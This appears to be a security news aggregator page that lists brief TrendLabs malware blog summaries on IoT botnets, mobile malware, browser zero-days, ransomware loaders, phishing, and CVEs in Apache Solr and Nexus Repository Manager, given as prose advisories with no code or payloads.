Top IT Security Bloggers

TrendLabs - Malware Blog
  • Bashlite IoT Malware Updated with Mining and Backdoor Commands, Targets WeMo Devices

    TrendLabs - Malware Blog
    We uncovered an updated Bashlite malware designed to add infected internet-of-things devices to a distributed-denial-of-service (DDoS) botnet. Based on the Metasploit module it exploits, the malware targets devices with the WeMo Universal Plug and Play (UPnP) application programming interface (API).
    This updated iteration of Bashlite is notable. For one, its arrival method is unique in that it doesn’t rely on specific vulnerabilities (e.g., security flaws assigned with CVEs). It instead abuses a publicly available remote-code-execution (RCE) Metasploit module.  It now also sports additional DDoS-related commands, and added new ones that gave the malware cryptocurrency mining and backdoor capabilities. It can also deliver malware that removes competing botnet malware.
    The post Bashlite IoT Malware Updated with Mining and Backdoor Commands, Targets WeMo Devices appeared first on .
  • New Version of XLoader That Disguises as Android Apps and an iOS Profile Holds New Links to FakeSpy

    TrendLabs - Malware Blog
    This new XLoader variant poses as a security app for Android devices, and uses a malicious iOS profile to affect iPhone and iPad devices. Aside from a change in its deployment techniques, a few changes in its code set it apart from its previous versions.
    The post New Version of XLoader That Disguises as Android Apps and an iOS Profile Holds New Links to FakeSpy appeared first on .
  • Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data

    TrendLabs - Malware Blog
    Two zero-day vulnerabilities in current versions of Microsoft Edge and Internet Explorer make it possible for confidential information to be shared between websites.
    The post Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data appeared first on .
  • Emotet-Distributed Ransomware Loader for Nozelesn Found via Managed Detection and Response

    TrendLabs - Malware Blog
    By Erika Mendoza, Jay Yaneza, Gilbert Sison, Anjali Patil, Julie Cabuhat, and Joelson Soares Through our managed detection and response (MDR) monitoring, we discovered the modular Emotet malware distributing the Nymaim malware, which then loads the Nozelesn ransomware. We detected this particular Emotet variant in one of our monitored endpoints in the hospitality industry in...
    The post Emotet-Distributed Ransomware Loader for Nozelesn Found via Managed Detection and Response appeared first on .
  • Desktop, Mobile Phishing Campaign Targets South Korean Websites, Steals Credentials Via Watering Hole

    TrendLabs - Malware Blog
    We discovered a phishing campaign targeting South Korean websites and users' credentials using the watering hole technique. Labeling the campaign Soula, cybercriminals injected a malicious JS code in at least four websites for a fake login pop-up to appear at intervals before they can continue using the pages.
    The post Desktop, Mobile Phishing Campaign Targets South Korean Websites, Steals Credentials Via Watering Hole appeared first on .
  • CVE-2019-0192: Mitigating Unsecure Deserialization in Apache Solr

    TrendLabs - Malware Blog
    Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
    Successfully exploiting this security flaw can let hackers execute arbitrary code in the context of the server application. For example, an unauthenticated hacker can exploit CVE-2019-0192 by sending a specially crafted Hypertext Transfer Protocol (HTTP) request to the Config API, which allows Apache Solr’s users to set up various elements of Apache Solr (via solrconfig.xml). Affected versions include Apache Solr 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5.
    The post CVE-2019-0192: Mitigating Unsecure Deserialization in Apache Solr appeared first on .
  • Telecom Crimes Against the IoT and 5G

    TrendLabs - Malware Blog
    Telecommunications or telecom technology is the underpinning of the modern internet, and consequently, the internet’s growing segment, the internet of things (IoT). At its best, this relationship is exemplified as advances in network connectivity as we move to 5G. In our paper with Europol’s European Cybercrime Centre (EC3), “Cyber-Telecom Crime Report 2019,” we explore how this relationship can also be used to threaten and defraud the IoT.
    The post Telecom Crimes Against the IoT and 5G appeared first on .
  • CVE-2019-7238: Insufficient Access Controls in Sonatype Nexus Repository Manager 3 Allows Remote Code Execution

    TrendLabs - Malware Blog
    A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning.
    The post CVE-2019-7238: Insufficient Access Controls in Sonatype Nexus Repository Manager 3 Allows Remote Code Execution appeared first on .
  • A Machine Learning Model to Detect Malware Variants

    TrendLabs - Malware Blog
    When malware is difficult to discover — and has limited samples for analysis — we propose a machine learning model that uses adversarial autoencoder and semantic hashing to find what bad actors try to hide. We, along with researchers from the Federation University Australia, discussed this model in our study titled “Generative Malware Outbreak Detection.”
    The post A Machine Learning Model to Detect Malware Variants appeared first on .
  • March’s Patch Tuesday Fixes Privilege Escalation Vulnerabilities Exploited in the Wild

    TrendLabs - Malware Blog
    Microsoft’s Patch Tuesday for March addressed 64 vulnerabilities, 17 of which were rated critical, 45 important, one moderate, and another low in severity. Two of these vulnerabilities, CVE-2019-0797 and CVE-2019-0808, were reported to have been actively exploited in the wild. The patches addressed security flaws in a number of Microsoft products and services: .NET Framework, Edge, Exchange, Internet Explorer, Office, Office Services and Web Apps, NuGet, Team Foundation Server, and Windows. Seven of the vulnerabilities were disclosed via Trend Micro’s Zero Day Initiative (ZDI).
    The post March’s Patch Tuesday Fixes Privilege Escalation Vulnerabilities Exploited in the Wild appeared first on .

Editor's Recommendations

Solution Centres

Brand Page

Events

View all events Submit your own security event

Latest Videos

More videos

Blog Posts

Media Release

More media release